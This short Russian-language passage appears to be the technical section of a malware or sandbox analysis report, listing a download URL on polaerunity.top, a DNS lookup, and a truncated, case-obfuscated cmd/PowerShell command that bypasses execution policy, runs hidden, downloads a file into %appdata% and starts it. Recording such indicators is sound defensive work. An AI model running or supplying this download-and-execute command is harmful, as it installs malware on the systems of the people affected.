Техническая информация
- http://polaerunity.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWErSHeLl.ExE -EXECUtiOnPOLicY Bypass -noProfIle -wiNDOWstyle HIddeN (nEw-oBJEcT SystEM.nET.WeBCLIEnT).DOWNloaDFIle('http://polaerunity.top/search.php','%appDATa%.EXe');staRT-ProC...
- DNS ASK po###runity.top
- '<SYSTEM32>\cmd.exe' /C "POWErSHeLl.ExE -EXECUtiOnPOLicY Bypass -noProfIle -wiNDOWstyle HIddeN (nEw-oBJEcT SystEM.nET.WeBCLIEnT).DOWNloaDFIle('http://polaerunity.top/search.php','%appDATa%.EXe');staRT-ProC...' (со скрытым окном)